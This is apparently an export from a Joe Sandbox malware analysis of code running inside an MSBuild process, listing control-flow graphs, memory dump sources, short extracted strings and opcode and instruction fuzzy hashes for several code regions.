                                                          execution_graph 20071 54c9ed8 20072 54c9f05 20071->20072 20074 54cbde7 20072->20074 20076 54ca20e 20072->20076 20077 54c9590 LdrInitializeThunk 20072->20077 20076->20074 20078 54c9590 LdrInitializeThunk 20076->20078 20077->20076 20078->20076 20079 54c9b94 20083 54c9a4b 20079->20083 20080 54c9b8c LdrInitializeThunk 20082 54c9ce9 20080->20082 20083->20080 20085 54c9590 LdrInitializeThunk 20083->20085 20085->20083

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 148 1036fc8-1036ffe 149 1037006-103700c 148->149 280 1037000 call 10369a0 148->280 281 1037000 call 1037118 148->281 282 1037000 call 1036fc8 148->282 150 103700e-1037012 149->150 151 103705c-1037060 149->151 154 1037021-1037028 150->154 155 1037014-1037019 150->155 152 1037062-1037071 151->152 153 1037077-103708b 151->153 156 1037073-1037075 152->156 157 103709d-10370a7 152->157 158 1037093-103709a 153->158 284 103708d call 1039dd0 153->284 285 103708d call 1039de0 153->285 286 103708d call 103a0e8 153->286 159 10370fe-103713b 154->159 160 103702e-1037035 154->160 155->154 156->158 161 10370b1-10370b5 157->161 162 10370a9-10370af 157->162 169 1037146-1037166 159->169 170 103713d-1037143 159->170 160->151 163 1037037-103703b 160->163 164 10370bd-10370f7 161->164 166 10370b7 161->166 162->164 167 103704a-1037051 163->167 168 103703d-1037042 163->168 164->159 166->164 167->159 171 1037057-103705a 167->171 168->167 177 1037168 169->177 178 103716d-1037174 169->178 170->169 171->158 180 10374fc-1037505 177->180 179 1037176-1037181 178->179 181 1037187-103719a 179->181 182 103750d-1037519 179->182 187 10371b0-10371cb 181->187 188 103719c-10371aa 181->188 189 103751b 182->189 190 103751e-1037521 182->190 197 10371ef-10371f2 187->197 198 10371cd-10371d3 187->198 188->187 196 1037484-103748b 188->196 189->190 191 1037523 190->191 192 1037526-1037549 190->192 191->192 199 1037552-1037556 192->199 200 103754b-1037550 192->200 196->180 205 103748d-103748f 196->205 201 10371f8-10371fb 197->201 202 103734c-1037352 197->202 203 10371d5 198->203 204 10371dc-10371df 198->204 206 103755c-103755d 199->206 200->206 201->202 209 1037201-1037207 201->209 207 1037358-103735d 202->207 208 103743e-1037441 202->208 203->202 203->204 203->208 210 1037212-1037218 203->210 204->210 211 10371e1-10371e4 204->211 212 1037491-1037496 205->212 213 103749e-10374a4 205->213 207->208 216 1037447-103744d 208->216 217 1037508 208->217 209->202 215 103720d 209->215 218 103721a-103721c 210->218 219 103721e-1037220 210->219 220 10371ea 211->220 221 103727e-1037284 211->221 212->213 213->182 214 10374a6-10374ab 213->214 222 10374f0-10374f3 214->222 223 10374ad-10374b2 214->223 215->208 225 1037472-1037476 216->225 226 103744f-1037457 216->226 217->182 227 103722a-1037233 218->227 219->227 220->208 221->208 224 103728a-1037290 221->224 222->217 235 10374f5-10374fa 222->235 223->217 228 10374b4 223->228 229 1037292-1037294 224->229 230 1037296-1037298 224->230 225->196 234 1037478-103747e 225->234 226->182 231 103745d-103746c 226->231 232 1037246-103726e 227->232 233 1037235-1037240 227->233 236 10374bb-10374c0 228->236 237 10372a2-10372b9 229->237 230->237 231->187 231->225 255 1037362-1037398 232->255 256 1037274-1037279 232->256 233->208 233->232 234->179 234->196 235->180 235->205 238 10374e2-10374e4 236->238 239 10374c2-10374c4 236->239 249 10372e4-103730b 237->249 250 10372bb-10372d4 237->250 238->217 246 10374e6-10374e9 238->246 243 10374d3-10374d9 239->243 244 10374c6-10374cb 239->244 243->182 248 10374db-10374e0 243->248 244->243 246->222 248->238 251 10374b6-10374b9 248->251 249->217 261 1037311-1037314 249->261 250->255 259 10372da-10372df 250->259 251->217 251->236 262 10373a5-10373ad 255->262 263 103739a-103739e 255->263 256->255 259->255 261->217 264 103731a-1037343 261->264 262->217 267 10373b3-10373b8 262->267 265 10373a0-10373a3 263->265 266 10373bd-10373c1 263->266 264->255 279 1037345-103734a 264->279 265->262 265->266 268 10373c3-10373c9 266->268 269 10373e0-10373e4 266->269 267->208 268->269 271 10373cb-10373d3 268->271 272 10373e6-10373ec 269->272 273 10373ee-103740d call 10376f1 269->273 271->217 274 10373d9-10373de 271->274 272->273 276 1037413-1037417 272->276 273->276 274->208 276->208 277 1037419-1037435 276->277 277->208 279->255 280->149 281->149 282->149 284->158 285->158 286->158
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oq$(oq$(oq$,q$,q
                                                          • API String ID: 0-189141485
                                                          • Opcode ID: 3329fdd261d649b988c2a0709af9946a6845fab1f4c7682755cc5479702ac823
                                                          • Instruction ID: e0e995e295a415cc0c4530a3ca3b182221c3ff28ad38915bdb2afc9a9603de7d
                                                          • Opcode Fuzzy Hash: 3329fdd261d649b988c2a0709af9946a6845fab1f4c7682755cc5479702ac823
                                                          • Instruction Fuzzy Hash: 881272B1A00209DFDB55CF69C884AADBBF6FF89300F1584A9E985AB261D734ED41CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oq$4'q$4'q$4'q
                                                          • API String ID: 0-2528434116
                                                          • Opcode ID: dcd0679dd4b38801d6b9de1c0d6b6a4f8055e533038b5ec65140d0a69bd3bdcc
                                                          • Instruction ID: 047992687a7638e58dc5368f9ea499b7c1f12ea4b78c2324a2a35978f7837955
                                                          • Opcode Fuzzy Hash: dcd0679dd4b38801d6b9de1c0d6b6a4f8055e533038b5ec65140d0a69bd3bdcc
                                                          • Instruction Fuzzy Hash: 87A29F71B04609CFCB15CFA8C584AAEBBFABFC8300F158559E585DB266D731E942CB50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 618 10329ec-10329f6 620 1032981-103298a 618->620 621 10329f8-1032a01 618->621 623 1032990 620->623 622 1032a03-1032a0c 621->622 621->623 624 1032999 622->624 625 1032a0e-1032a3b 622->625 626 1032997 623->626 627 10329a0-10329c8 624->627 630 1032a5d-1032aac 625->630 631 1032a3d-1032a5c 625->631 626->624 635 1032ac7-1032acf 630->635 636 1032aae-1032ab5 630->636 639 1032ad2-1032ae6 635->639 637 1032ab7-1032abc 636->637 638 1032abe-1032ac5 636->638 637->639 638->639 642 1032ae8-1032aef 639->642 643 1032afc-1032b04 639->643 644 1032af1-1032af3 642->644 645 1032af5-1032afa 642->645 646 1032b06-1032b0a 643->646 644->646 645->646 648 1032b6a-1032b6d 646->648 649 1032b0c-1032b21 646->649 650 1032bb5-1032bbb 648->650 651 1032b6f-1032b84 648->651 649->648 657 1032b23-1032b26 649->657 652 1032bc1-1032bc3 650->652 653 10336b6 650->653 651->650 661 1032b86-1032b8a 651->661 652->653 655 1032bc9-1032bce 652->655 658 10336bb-1033700 653->658 659 1033664-1033668 655->659 660 1032bd4 655->660 662 1032b45-1032b63 call 10302c8 657->662 663 1032b28-1032b2a 657->663 679 1033702-1033728 658->679 680 103372e-1033874 658->680 665 103366a-103366d 659->665 666 103366f-10336b5 659->666 660->659 667 1032b92-1032bb0 call 10302c8 661->667 668 1032b8c-1032b90 661->668 662->648 663->662 669 1032b2c-1032b2f 663->669 665->658 665->666 667->650 668->650 668->667 669->648 673 1032b31-1032b43 669->673 673->648 673->662 679->680 683 10338a6-10338a9 680->683 684 1033876-1033878 680->684 686 10338aa-10338bc 683->686 684->686 687 103387a-10338a3 684->687 689 10338ee-10338f4 686->689 690 10338be-10338eb 686->690 687->683 692 10338f6-1033908 689->692 693 1033928-1033937 689->693 690->689 694 103393a-103393d 692->694 695 103390a-103390c 692->695 693->694 697 103393e-1033941 694->697 695->697 698 103390e-1033910 695->698 699 1033942-10339e8 697->699 698->699 700 1033912-1033927 698->700 700->693
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq$Xq$Xq
                                                          • API String ID: 0-3965792415
                                                          • Opcode ID: cbfb9058e7ebce28cda31121bcfa4a263e3844e4740e096692210006e55e4d97
                                                          • Instruction ID: 55b05b321fc40cab5b1018d6ba0470acdd1c7557fd48c0abf721b229d6a7abb4
                                                          • Opcode Fuzzy Hash: cbfb9058e7ebce28cda31121bcfa4a263e3844e4740e096692210006e55e4d97
                                                          • Instruction Fuzzy Hash: 4C02BF329047948FCB62CF78C8D279ABBF4FF4A314B1888DEC485CA616D735A815DB52
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: (oq$Hq
                                                          • API String ID: 0-2917151738
                                                          • Opcode ID: 93186d5c49ca32368fbed33f0ecc9d93d7ef4f5bccd1a71d580607a4d188f74d
                                                          • Instruction ID: 024880d4aea493edd3846f15b74b0bb1e0ce6d6e4e8464a7420c032bb6bb40ea
                                                          • Opcode Fuzzy Hash: 93186d5c49ca32368fbed33f0ecc9d93d7ef4f5bccd1a71d580607a4d188f74d
                                                          • Instruction Fuzzy Hash: CA128E70A002199FDB14DF69C894BAEBBF6BFC8300F148569E5469B395DB319E42CB90

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2117 1033aa1-1033c64 2118 1033c69-1033ca4 2117->2118 2118->2118 2119 1033ca6-1033cd9 2118->2119 2121 1033cdb-1033cdd 2119->2121 2122 1033cea-1033cf2 2119->2122 2123 1033ce3-1033ce8 2121->2123 2124 1033cdf-1033ce1 2121->2124 2125 1033cf4-1033d02 2122->2125 2123->2125 2124->2125 2128 1033d04-1033d06 2125->2128 2129 1033d18-1033d20 2125->2129 2130 1033d08-1033d0d 2128->2130 2131 1033d0f-1033d16 2128->2131 2132 1033d23-1033d26 2129->2132 2130->2132 2131->2132 2134 1033d28-1033d36 2132->2134 2135 1033d3d-1033d41 2132->2135 2134->2135 2142 1033d38 2134->2142 2136 1033d43-1033d51 2135->2136 2137 1033d5a-1033d5d 2135->2137 2136->2137 2147 1033d53 2136->2147 2139 1033d65-1033d9a 2137->2139 2140 1033d5f-1033d63 2137->2140 2148 1033dfc-1033e01 2139->2148 2140->2139 2141 1033d9c-1033db3 2140->2141 2145 1033db5-1033db7 2141->2145 2146 1033db9-1033dc5 2141->2146 2142->2135 2145->2148 2149 1033dc7-1033dcd 2146->2149 2150 1033dcf-1033dd9 2146->2150 2147->2137 2152 1033de1-1033df5 2149->2152 2150->2152 2153 1033ddb 2150->2153 2152->2148 2153->2152
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$Xq
                                                          • API String ID: 0-1556399337
                                                          • Opcode ID: aed355c51f343d220dad8fb36c365c92827af8385c83fc95a16c33b1f36ab02c
                                                          • Instruction ID: e0789faf91c603a745ebc5a591f4fd1f2120a271f978221f135c161bf58c6755
                                                          • Opcode Fuzzy Hash: aed355c51f343d220dad8fb36c365c92827af8385c83fc95a16c33b1f36ab02c
                                                          • Instruction Fuzzy Hash: 1FA1A2326097A18FCB668F78D8D67567BF5FF4322470884EDC482CE61AD6389805DB53

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2158 1033e09-1033e25 2159 1033e27-1033e29 2158->2159 2160 1033e2e-1033e3e 2158->2160 2161 10340cc-10340d3 2159->2161 2162 1033e40 2160->2162 2163 1033e45-1033e55 2160->2163 2162->2161 2165 10340b3-10340c1 2163->2165 2166 1033e5b-1033e69 2163->2166 2169 10340d4-1034152 2165->2169 2171 10340c3-10340c7 call 10302c8 2165->2171 2166->2169 2170 1033e6f 2166->2170 2170->2169 2172 1033f00-1033f21 2170->2172 2173 1034067-1034082 call 10302d8 2170->2173 2174 10340a7-10340b1 2170->2174 2175 1033f26-1033f47 2170->2175 2176 1034084-10340a5 call 10328f0 2170->2176 2177 103400e-1034034 2170->2177 2178 1033e8d-1033eae 2170->2178 2179 1033f4c-1033f6d 2170->2179 2180 1033fcc-1034009 2170->2180 2181 1033eb3-1033ed5 2170->2181 2182 1033f72-1033f9a 2170->2182 2183 1033e76-1033e88 2170->2183 2184 1033eda-1033efb 2170->2184 2185 1034039-1034065 2170->2185 2186 1033f9f-1033fc7 2170->2186 2171->2161 2172->2161 2173->2161 2174->2161 2175->2161 2176->2161 2177->2161 2178->2161 2179->2161 2180->2161 2181->2161 2182->2161 2183->2161 2184->2161 2185->2161 2186->2161
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Xq$$q
                                                          • API String ID: 0-855381642
                                                          • Opcode ID: 92739479ab38587227ea951136192ff164a56acb63360ec43462cb120350b8e0
                                                          • Instruction ID: 60a4e13c5f717ddfd9c74c46045dbdefffcf01db4c3eab4b2d0654fd5035c810
                                                          • Opcode Fuzzy Hash: 92739479ab38587227ea951136192ff164a56acb63360ec43462cb120350b8e0
                                                          • Instruction Fuzzy Hash: 25917130F04219DFDB18EBB9985437EBBA6BFC8700B15862DE546EB294CE359C028795

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2240 103c73e-103c768 2241 103c76a 2240->2241 2242 103c76f-103c84c call 10341a0 call 1033cc0 2240->2242 2241->2242 2252 103c853-103c874 call 1035658 2242->2252 2253 103c84e 2242->2253 2255 103c879-103c884 2252->2255 2253->2252 2256 103c886 2255->2256 2257 103c88b-103c88f 2255->2257 2256->2257 2258 103c891-103c892 2257->2258 2259 103c894-103c89b 2257->2259 2260 103c8b3-103c8f7 2258->2260 2261 103c8a2-103c8b0 2259->2261 2262 103c89d 2259->2262 2266 103c95d-103c974 2260->2266 2261->2260 2262->2261 2268 103c976-103c99b 2266->2268 2269 103c8f9-103c90f 2266->2269 2275 103c9b3 2268->2275 2276 103c99d-103c9b2 2268->2276 2273 103c911-103c91d 2269->2273 2274 103c939 2269->2274 2277 103c927-103c92d 2273->2277 2278 103c91f-103c925 2273->2278 2279 103c93f-103c95c 2274->2279 2276->2275 2280 103c937 2277->2280 2278->2280 2279->2266 2280->2279
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: e6168a4a0258de00399963f3b0657b5a10de8c482fa099a7af6b14f420ce3d7b
                                                          • Instruction ID: d069e6e28d095b7b49104c37bc9b0f5b9b121675b8590a0eb3d857f4ad3748aa
                                                          • Opcode Fuzzy Hash: e6168a4a0258de00399963f3b0657b5a10de8c482fa099a7af6b14f420ce3d7b
                                                          • Instruction Fuzzy Hash: C081A074E00218DFEB54DFAAD984A9DBBF2BF88310F14C06AE459AB365DB709941CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2284 103c1a7-103c1c8 2285 103c1ca 2284->2285 2286 103c1cf-103c2ac call 10341a0 call 1033cc0 2284->2286 2285->2286 2296 103c2b3-103c2d4 call 1035658 2286->2296 2297 103c2ae 2286->2297 2299 103c2d9-103c2e4 2296->2299 2297->2296 2300 103c2e6 2299->2300 2301 103c2eb-103c2ef 2299->2301 2300->2301 2302 103c2f1-103c2f2 2301->2302 2303 103c2f4-103c2fb 2301->2303 2304 103c313-103c357 2302->2304 2305 103c302-103c310 2303->2305 2306 103c2fd 2303->2306 2310 103c3bd-103c3d4 2304->2310 2305->2304 2306->2305 2312 103c3d6-103c3fb 2310->2312 2313 103c359-103c36f 2310->2313 2319 103c413 2312->2319 2320 103c3fd-103c412 2312->2320 2317 103c371-103c37d 2313->2317 2318 103c399 2313->2318 2321 103c387-103c38d 2317->2321 2322 103c37f-103c385 2317->2322 2323 103c39f-103c3bc 2318->2323 2320->2319 2324 103c397 2321->2324 2322->2324 2323->2310 2324->2323
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: f2a467e5d3431de5fdca10f1a4640906fa4ef34128bca5c0afe6a5827a8a3cfe
                                                          • Instruction ID: 495cbe75d8bb474e7e694ad7b641fe7eedbe9f77e3edf9302333eaa0beb75ce5
                                                          • Opcode Fuzzy Hash: f2a467e5d3431de5fdca10f1a4640906fa4ef34128bca5c0afe6a5827a8a3cfe
                                                          • Instruction Fuzzy Hash: E5818F74E002188FEB54DFAAD984A9DBBF2BF89300F14D06AE459AB365DB709941CF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2460 103d284-103d2a8 2461 103d2aa 2460->2461 2462 103d2af-103d30e call 10341a0 2460->2462 2461->2462 2466 103d313-103d38c call 1033cc0 2462->2466 2472 103d393-103d3c4 call 1035658 2466->2472 2473 103d38e 2466->2473 2476 103d3c6 2472->2476 2477 103d3cb-103d3cf 2472->2477 2473->2472 2476->2477 2478 103d3d1-103d3d2 2477->2478 2479 103d3d4-103d3db 2477->2479 2480 103d3f3-103d437 2478->2480 2481 103d3e2-103d3f0 2479->2481 2482 103d3dd 2479->2482 2486 103d49d-103d4b4 2480->2486 2481->2480 2482->2481 2488 103d4b6-103d4db 2486->2488 2489 103d439-103d44f 2486->2489 2495 103d4f3-103d555 2488->2495 2496 103d4dd-103d4ea 2488->2496 2492 103d451-103d45d 2489->2492 2493 103d479 2489->2493 2497 103d467-103d46d 2492->2497 2498 103d45f-103d465 2492->2498 2499 103d47f-103d49c 2493->2499 2506 103d4e7 2495->2506 2507 103d557-103d58c 2495->2507 2504 103d4f2 2496->2504 2500 103d477 2497->2500 2498->2500 2499->2486 2500->2499 2504->2495 2506->2504 2509 103d58f-103d5fd 2507->2509 2515 103d5ff-103d63d 2509->2515 2518 103d667 2515->2518 2519 103d63f-103d646 2515->2519 2523 103d668 2518->2523 2520 103d652-103d655 2519->2520 2521 103d648-103d650 call 103d558 2519->2521 2524 103d659-103d65f 2520->2524 2521->2524 2523->2523 2524->2518
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: be36ecd965a1803b1d81aa0c24374f4c9cd3454a9c11ba715daf63fef726c310
                                                          • Instruction ID: c42891fe4954217ff29e14cafec203db767850ab4854686e0dbf9b3dde59f330
                                                          • Opcode Fuzzy Hash: be36ecd965a1803b1d81aa0c24374f4c9cd3454a9c11ba715daf63fef726c310
                                                          • Instruction Fuzzy Hash: B4819074E00218CFEB54DFAAD984A9DBBF2BF88300F14D069E859AB365DB709941CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2328 103c477-103c498 2329 103c49a 2328->2329 2330 103c49f-103c57c call 10341a0 call 1033cc0 2328->2330 2329->2330 2340 103c583-103c5a4 call 1035658 2330->2340 2341 103c57e 2330->2341 2343 103c5a9-103c5b4 2340->2343 2341->2340 2344 103c5b6 2343->2344 2345 103c5bb-103c5bf 2343->2345 2344->2345 2346 103c5c1-103c5c2 2345->2346 2347 103c5c4-103c5cb 2345->2347 2348 103c5e3-103c627 2346->2348 2349 103c5d2-103c5e0 2347->2349 2350 103c5cd 2347->2350 2354 103c68d-103c6a4 2348->2354 2349->2348 2350->2349 2356 103c6a6-103c6cb 2354->2356 2357 103c629-103c63f 2354->2357 2364 103c6e3 2356->2364 2365 103c6cd-103c6e2 2356->2365 2361 103c641-103c64d 2357->2361 2362 103c669 2357->2362 2366 103c657-103c65d 2361->2366 2367 103c64f-103c655 2361->2367 2363 103c66f-103c68c 2362->2363 2363->2354 2365->2364 2368 103c667 2366->2368 2367->2368 2368->2363
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: 28775ba77d47f5b175d0e05f795751526bb58c6875d5989c562738fe236b5fb2
                                                          • Instruction ID: 60535a31a67e3f9800a67820f32cd5b60f42a7bc93961321046f51da5b8fe11c
                                                          • Opcode Fuzzy Hash: 28775ba77d47f5b175d0e05f795751526bb58c6875d5989c562738fe236b5fb2
                                                          • Instruction Fuzzy Hash: 8081A174E00218CFEB54DFAAD984A9DBBF2BF88300F14906AE459AB365DB709941DF50

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2372 103cce7-103cd08 2373 103cd0a 2372->2373 2374 103cd0f-103cdec call 10341a0 call 1033cc0 2372->2374 2373->2374 2384 103cdf3-103ce14 call 1035658 2374->2384 2385 103cdee 2374->2385 2387 103ce19-103ce24 2384->2387 2385->2384 2388 103ce26 2387->2388 2389 103ce2b-103ce2f 2387->2389 2388->2389 2390 103ce31-103ce32 2389->2390 2391 103ce34-103ce3b 2389->2391 2392 103ce53-103ce97 2390->2392 2393 103ce42-103ce50 2391->2393 2394 103ce3d 2391->2394 2398 103cefd-103cf14 2392->2398 2393->2392 2394->2393 2400 103cf16-103cf3b 2398->2400 2401 103ce99-103ceaf 2398->2401 2407 103cf53 2400->2407 2408 103cf3d-103cf52 2400->2408 2405 103ceb1-103cebd 2401->2405 2406 103ced9 2401->2406 2409 103cec7-103cecd 2405->2409 2410 103cebf-103cec5 2405->2410 2411 103cedf-103cefc 2406->2411 2408->2407 2412 103ced7 2409->2412 2410->2412 2411->2398 2412->2411
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: ae07ea9da7938e62c2825e9031965f9b54d6699b2d24dcd7af06469039e5734a
                                                          • Instruction ID: f1328f2d56e37662f2126459efc2e25a3921ddeb41e1feb8352af0773a7ec80c
                                                          • Opcode Fuzzy Hash: ae07ea9da7938e62c2825e9031965f9b54d6699b2d24dcd7af06469039e5734a
                                                          • Instruction Fuzzy Hash: 6C819274E00218CFEB54DFAAD984A9DBBF2BF88300F14D06AE459AB365DB709941CF51

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2416 103cfb7-103cfd8 2417 103cfda 2416->2417 2418 103cfdf-103d0bc call 10341a0 call 1033cc0 2416->2418 2417->2418 2428 103d0c3-103d0e4 call 1035658 2418->2428 2429 103d0be 2418->2429 2431 103d0e9-103d0f4 2428->2431 2429->2428 2432 103d0f6 2431->2432 2433 103d0fb-103d0ff 2431->2433 2432->2433 2434 103d101-103d102 2433->2434 2435 103d104-103d10b 2433->2435 2436 103d123-103d167 2434->2436 2437 103d112-103d120 2435->2437 2438 103d10d 2435->2438 2442 103d1cd-103d1e4 2436->2442 2437->2436 2438->2437 2444 103d1e6-103d20b 2442->2444 2445 103d169-103d17f 2442->2445 2452 103d223 2444->2452 2453 103d20d-103d222 2444->2453 2449 103d181-103d18d 2445->2449 2450 103d1a9 2445->2450 2454 103d197-103d19d 2449->2454 2455 103d18f-103d195 2449->2455 2451 103d1af-103d1cc 2450->2451 2451->2442 2453->2452 2456 103d1a7 2454->2456 2455->2456 2456->2451
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: b4a2896e3ee20459d3987e39503bf2b5b604888e042e4334d5c094ceb5f79a5e
                                                          • Instruction ID: d6102e44fd4df3930d28f369fe998de919cabffdba9066d1bcee3048dbc8ccae
                                                          • Opcode Fuzzy Hash: b4a2896e3ee20459d3987e39503bf2b5b604888e042e4334d5c094ceb5f79a5e
                                                          • Instruction Fuzzy Hash: FD819074E00218DFEB54DFAAD984B9DBBF2BF88300F149169E859AB365DB709941CF10

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 2571 1035381-10353a0 2572 10353a2 2571->2572 2573 10353a7-1035484 call 10341a0 call 1033cc0 2571->2573 2572->2573 2583 1035486 2573->2583 2584 103548b-10354a9 2573->2584 2583->2584 2601 10354ac call 1035649 2584->2601 2602 10354ac call 1035658 2584->2602 2585 10354b2-10354bd 2586 10354c4-10355d4 2585->2586 2587 10354bf 2585->2587 2597 10355d6-10355eb 2586->2597 2598 10355ec 2586->2598 2587->2586 2597->2598 2601->2585 2602->2585
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: f11f2ff38cf7cda77287df0ff6efed1cd978611a842ee63a9305a3f37acc0727
                                                          • Instruction ID: e813c185e46a1319b81711e01bc879aa920b34b9c1aa174088f9aae600bc159e
                                                          • Opcode Fuzzy Hash: f11f2ff38cf7cda77287df0ff6efed1cd978611a842ee63a9305a3f37acc0727
                                                          • Instruction Fuzzy Hash: A061B674E00218DFDB58DFAAD984A9DBBF2BF88300F14C169E859AB365DB349941CF50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_1030000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: PHq$PHq
                                                          • API String ID: 0-1274609152
                                                          • Opcode ID: ea84006bba287106d4738a7be097ed10ea8ffcb7737c7972c89ee41cd6a97a19
                                                          • Instruction ID: bf0719e0012d4a7197934accd03013f7e7d83fcb1257d3a262ec47a1b4851b2e
                                                          • Opcode Fuzzy Hash: ea84006bba287106d4738a7be097ed10ea8ffcb7737c7972c89ee41cd6a97a19
                                                          • Instruction Fuzzy Hash: EA51C674E006088FEB18DFAAD984A9DBBF2BF88300F14D06AE458BB365DB745941CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3764544773.00000000054C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054C0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_54c0000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 45a5b5fa1b6b47d0ef9ac14fd4a268a85c5a65f8abc8bea63b26ad1dd0c221d5
                                                          • Instruction ID: 9d8b708620b0ade92c01c712ae88314bf8ca71e269687905e90ff2aed4966344
                                                          • Opcode Fuzzy Hash: 45a5b5fa1b6b47d0ef9ac14fd4a268a85c5a65f8abc8bea63b26ad1dd0c221d5
                                                          • Instruction Fuzzy Hash: A1F1F374E01218DFDB54DFA9C984BDDBBB2BF88304F5481AAD408AB355DB70A986CF50
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.3760992202.0000000001030000.00000040.00000800.00020000.00000000.sdmp, Offset: 01030000, based on PE: false
